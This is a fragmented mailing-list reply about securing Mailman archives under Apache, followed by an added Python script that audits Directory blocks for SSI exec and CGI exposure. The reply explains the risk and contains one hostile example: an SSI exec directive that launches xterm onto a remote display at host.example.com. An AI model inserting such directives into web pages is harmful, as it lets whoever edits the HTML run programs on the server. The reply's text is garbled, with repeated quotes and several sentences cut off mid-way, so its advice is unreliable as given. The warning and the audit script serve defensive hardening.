> first of all, is it okay to use the following apache srm.conf
> aliases for mailman instead of the one it asks for?
>
> Alias /archives/ /home/mailman/archives/public/
> ScriptAlias /lists/ /home/mailman/cgi-bin/
>
> (everything seems to work fine with that except the following)
> first of all, is it okay to use the following apache srm.conf
> (everything seems to work fine with that except the following)
Suppose that you were going to try to access /archives/private.
/archives expands out to /home/mailman/archives/public, then
Ooops. You might want to turn off the Includes option there.
Otherwise list managers can use the HTML editing features of Mailman
to run programs on your system from the archives. i.e. adding this
HTML could pop up an xterm as the user running the script onto a
<!--#exec cmd="/usr/X11R6/bin/xterm -display host.example.com:0"-->
(which is one reason why I don't have any X binaries on my Web server).
By carefully manipulating these values (and a little security know-how)
a skilled cracker could easily gain a root shell to your system.
If you absolutely have to allow SSI, you may want to at least run
Mailman through an SSL-aware server. At least then your passwords
A better thing to do is only allow CGI within $prefix/cgi-bin and
Of course, replace $prefix with the directory where Mailman is
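As an added illustration of the point the reply makes (not code from the thread or from the Mailman project), the following script embeds two constructed Apache configuration fragments, one with `Includes` left on for the public archive directory and one with SSI and CGI execution turned off there, and audits the `<Directory>` blocks the way an administrator would check a real httpd.conf. The helper names `effective_options` and `audit`, the `cgi_dir` parameter and both config strings are assumptions made for this example; the `Options` merge rules it applies (an unsigned option list replaces the set, `+`/`-` forms adjust it, `All` implies `Includes` and `ExecCGI`) are Apache's documented behaviour.

```python
"""Audit Apache <Directory> blocks for SSI 'exec' and stray CGI exposure.

Added example, not part of the original thread. The two configuration
snippets are constructed to show the weak setting beside the hardened one.
"""
import re

# Constructed: the risky configuration the reply warns about. With
# Includes on, a list manager who can edit archive HTML can place an
# <!--#exec ...--> directive that the web server will run.
WEAK_CONF = """
Alias /archives/ /home/mailman/archives/public/
ScriptAlias /lists/ /home/mailman/cgi-bin/
<Directory /home/mailman/archives/public>
    Options Indexes Includes
    AllowOverride None
</Directory>
"""

# Constructed: SSI exec and CGI turned off on the archive tree; CGI is
# allowed only under the cgi-bin directory that ScriptAlias points at.
HARDENED_CONF = """
Alias /archives/ /home/mailman/archives/public/
ScriptAlias /lists/ /home/mailman/cgi-bin/
<Directory /home/mailman/archives/public>
    Options -Includes -ExecCGI
    AllowOverride None
</Directory>
<Directory /home/mailman/cgi-bin>
    Options ExecCGI
</Directory>
"""

DIR_RE = re.compile(r'<Directory\s+"?([^"\s>]+)"?\s*>(.*?)</Directory>', re.S | re.I)
OPT_RE = re.compile(r'^\s*Options\s+(.+?)\s*$', re.M | re.I)


def effective_options(body, inherited=()):
    """Merge Options lines as Apache does: a line made of unsigned names
    replaces the inherited set, a line of +/- names adjusts it."""
    opts = set(o.lower() for o in inherited)
    for line in OPT_RE.findall(body):
        toks = line.split()
        if all(t[0] in "+-" for t in toks):
            for t in toks:
                if t[0] == "+":
                    opts.add(t[1:].lower())
                else:
                    opts.discard(t[1:].lower())
        else:
            opts = set(t.lower() for t in toks)
    return opts


def audit(conf, cgi_dir="/home/mailman/cgi-bin", inherited=()):
    """Return {directory_path: [findings]} for every <Directory> block.

    'inherited' is the Options set in force from the enclosing scope
    (empty by default; pass the server-level value when auditing a real
    configuration). 'cgi_dir' is the one directory where ExecCGI is expected.
    """
    findings = {}
    for path, body in DIR_RE.findall(conf):
        opts = effective_options(body, inherited)
        issues = []
        # 'Includes' (or 'All') permits <!--#exec-->; IncludesNOEXEC does not.
        if "includes" in opts or "all" in opts:
            issues.append("SSI exec enabled (use IncludesNOEXEC or -Includes)")
        if ("execcgi" in opts or "all" in opts) and path.rstrip("/") != cgi_dir:
            issues.append("ExecCGI enabled outside cgi-bin")
        findings[path] = issues
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label)
        for path, issues in audit(conf).items():
            print("  %s: %s" % (path, issues or "ok"))
```

Run against the constructed snippets, the weak configuration is flagged for SSI exec on the archive directory and the hardened one reports nothing; on a real server, feed it the server-level `Options` value as `inherited`, since a block with no `Options` line of its own inherits whatever the enclosing scope set.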